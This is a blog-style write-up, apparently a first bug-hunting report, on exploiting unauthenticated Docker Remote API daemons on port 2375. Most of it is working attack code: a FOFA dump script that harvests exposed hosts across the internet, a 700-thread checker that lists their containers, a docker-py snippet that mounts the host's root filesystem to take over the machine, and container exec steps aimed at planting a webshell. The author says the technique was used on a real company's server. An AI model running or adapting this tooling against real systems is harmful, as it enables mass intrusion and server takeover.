Docker is an open-source application container engine that lets developers package an application together with its dependencies into a portable container and ship it to any mainstream Linux machine; it can also serve as a lightweight form of virtualization. Docker Swarm, provided by Docker itself, turns a cluster of Docker hosts into a single virtual Docker host; because it speaks the standard Docker API, it makes managing and scaling a Docker cluster straightforward.

The Docker Remote API is the REST API that replaced the old remote command-line interface (rcli). When it is misconfigured it is exposed without authentication: an attacker can talk to it with an ordinary docker client or with plain HTTP requests, which can leak sensitive information or let the attacker delete data on the Docker host. Worse, by abusing Docker's own features the attacker can read or modify sensitive files on the host machine directly and ultimately take full control of the server.
This was my first bug hunt: two days ago I used this vulnerability to take over a server belonging to a large company in Nanjing, and it has already been assigned a CNVD number, so I'm writing this post to record and share the process.
This article is for learning and reference only. If you save or download it, delete it within 12 hours. Do not redistribute it, use it commercially, or apply the techniques described here to illegal activity; reposting is strictly prohibited. You alone bear the consequences otherwise.
<!--more-->
First, use FOFA to pull down every asset speaking the Docker protocol on port 2375 (a query like `port=2375` works, optionally narrowed with FOFA's protocol filter), then run a script over the results to check each host.
You'll find hosts where port 2375 is open and the API answers without any authorization.
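Checking whether a given daemon is exposed takes nothing more than a plain HTTP GET against the Remote API. A minimal sketch with requests (the target address is a placeholder, and only probe hosts you are authorized to test; `/version` and `/containers/json` are standard Docker Engine API endpoints):

```python
import requests

target = "1.2.3.4"   # placeholder: a host you are authorized to test
base = "http://{}:2375".format(target)

# /version answers without credentials on a misconfigured daemon
print(requests.get(base + "/version", timeout=5).json())

# the same unauthenticated API lists every container
print(requests.get(base + "/containers/json?all=true", timeout=5).json())
```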
Prerequisite: the target server must be able to execute `docker run` (i.e. you can create and start containers through the API).
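Given that, the classic route to the host is to start a container that bind-mounts the host's root filesystem and operate on the host through the mount. A minimal sketch using docker-py's low-level `APIClient`, assuming an `alpine` image is already present on the target (otherwise pull one first with `cli.pull('alpine')`); `TARGET` is a placeholder:

```python
import docker

# talk straight to the unauthenticated daemon (TARGET is a placeholder)
cli = docker.APIClient(base_url='tcp://TARGET:2375')

# bind-mount the host's / into the container at /mnt
host_config = cli.create_host_config(binds=['/:/mnt'])
container = cli.create_container(
    image='alpine',                   # assumes this image already exists on the host
    command='cat /mnt/etc/hostname',  # the command now sees the host's filesystem
    host_config=host_config,
)
cli.start(container=container['Id'])
cli.wait(container=container['Id'])
print(cli.logs(container=container['Id']).decode())
```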
At this point the host is effectively under control. A reverse shell or writing your own SSH key onto the host won't necessarily work directly, though, and for risk reasons I won't demonstrate either here; the general approach is the same, operating on the host through the mounted filesystem.
If the escape above is not available, but the server runs a web service inside a Docker container, you can try entering that container and dropping a webshell to take the machine over indirectly.
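Locating the web container and running commands inside it can be done over the same Remote API. A sketch, with `TARGET` and `CONTAINER_ID` as placeholders:

```python
import docker

cli = docker.APIClient(base_url='tcp://TARGET:2375')  # TARGET is a placeholder

# image, names and published ports usually give the web container away
for c in cli.containers(all=True):
    print(c['Id'][:12], c['Image'], c['Names'], c.get('Ports'))

# run a command inside the chosen container (CONTAINER_ID is a placeholder)
exec_id = cli.exec_create('CONTAINER_ID', cmd='id')
print(cli.exec_start(exec_id).decode())
```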
As for tooling: the FOFA dump script below takes the query as its only command-line argument, base64-encodes it for the API, and appends the host field of every result to `<query>.txt`:

```python
import requests
import base64
import sys

email = r'xxx@qq.com'
api_key = r'fofa_api_key'
api = r'https://fofa.info/api/v1/search/all?email={}&key={}&qbase64={}&size=10000'

# FOFA query string, passed as the first argument
arg = sys.argv[1]
print(arg)

# the API expects the query base64-encoded in the qbase64 parameter
flag = base64.b64encode(arg.encode()).decode()
response = requests.get(api.format(email, api_key, flag))
results = response.json()["results"]
print("Got {} records in total!".format(len(results)))

# one host per line, appended to <query>.txt
file_name = r"{}.txt".format(arg)
with open(file_name, "a") as f:
    for addr in results:
        f.write(addr[0] + '\n')
```
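For example, `python3 fofa_dump.py port=2375` (the file name `fofa_dump.py` is my own choice) produces `port=2375.txt`, which is exactly the input file the batch checker below expects.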
The checker loads those hosts into a queue and spins up a pool of worker threads; each worker asks the Remote API for its version and container list, and every reachable, unauthenticated daemon is recorded in `result.txt`:

```python
import queue
import threading
import time
import json

import requests
import docker

thread_lock = threading.Lock()
out_result = []
multi = 700                         # number of worker threads
queueSize = 800
input_file_path = "./port=2375.txt"
output_file_path = './result.txt'
ports = ['2375']
wait_time = 5                       # seconds to let the reader thread fill the queue


def read_file():
    """Feed every line of the input file into the work queue."""
    with open(input_file_path, 'r') as fp:
        data_list = fp.readlines()
    data_length = len(data_list)
    flag_xy = 0
    while flag_xy != data_length:
        while (not workQueue.full()) and (flag_xy != data_length):
            workQueue.put(data_list[flag_xy])
            flag_xy += 1
    print("Finished queueing the input file")


def multi_start_main():
    """Worker loop: drain the queue and check each host."""
    while not workQueue.empty():
        file_line_api = workQueue.get()
        custom_def(file_line_api)


def http_get(url):
    # timeout added so a dead host doesn't hang a worker forever
    response = requests.get(url, timeout=wait_time)
    return response.text


def get_version(host, port):
    """GET /version on the Remote API; an answer means no auth is required."""
    url = "http://" + host + ":" + port + "/version"
    ret = json.loads(http_get(url))
    return ret['ApiVersion']


def get_container(host, port, docker_version):
    # docker.APIClient is the low-level client (called Client in docker-py < 2.0)
    return docker.APIClient(base_url='tcp://' + host + ':' + port,
                            version=docker_version)


def custom_def(file_line_api):
    ip = file_line_api.strip()
    result = ''
    for port in ports:
        try:
            docker_version = get_version(ip, port)
            result = ip + '\t' + port + '\tversion:' + docker_version
            docker_containers = get_container(ip, port, docker_version)
            result += '\t' + str(docker_containers.containers(all=True))
        except Exception as e:
            print(ip, e)
        if result:
            print('success:', result)
            with thread_lock:
                out_result.append(result)
            break


if __name__ == '__main__':
    threads = []
    workQueue = queue.Queue(queueSize)
    fileThread = threading.Thread(target=read_file)
    fileThread.start()
    print("Giving the reader thread %ss to fill the queue" % wait_time)
    time.sleep(wait_time)
    for i in range(multi + 1):
        thread = threading.Thread(target=multi_start_main)
        thread.start()
        threads.append(thread)
    for t in threads:
        t.join()
    fileThread.join()
    with open(output_file_path, 'w') as fw:
        # one result per line (the original wrote them unseparated)
        fw.writelines(line + '\n' for line in out_result)
    print("Main thread done, task complete")
```
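A hit shows up in `result.txt` as host, port, API version, and the full container list on one tab-separated line. Note that `multi = 700` threads is aggressive for a large target list; the queue-plus-worker layout lets you dial it down without changing anything else.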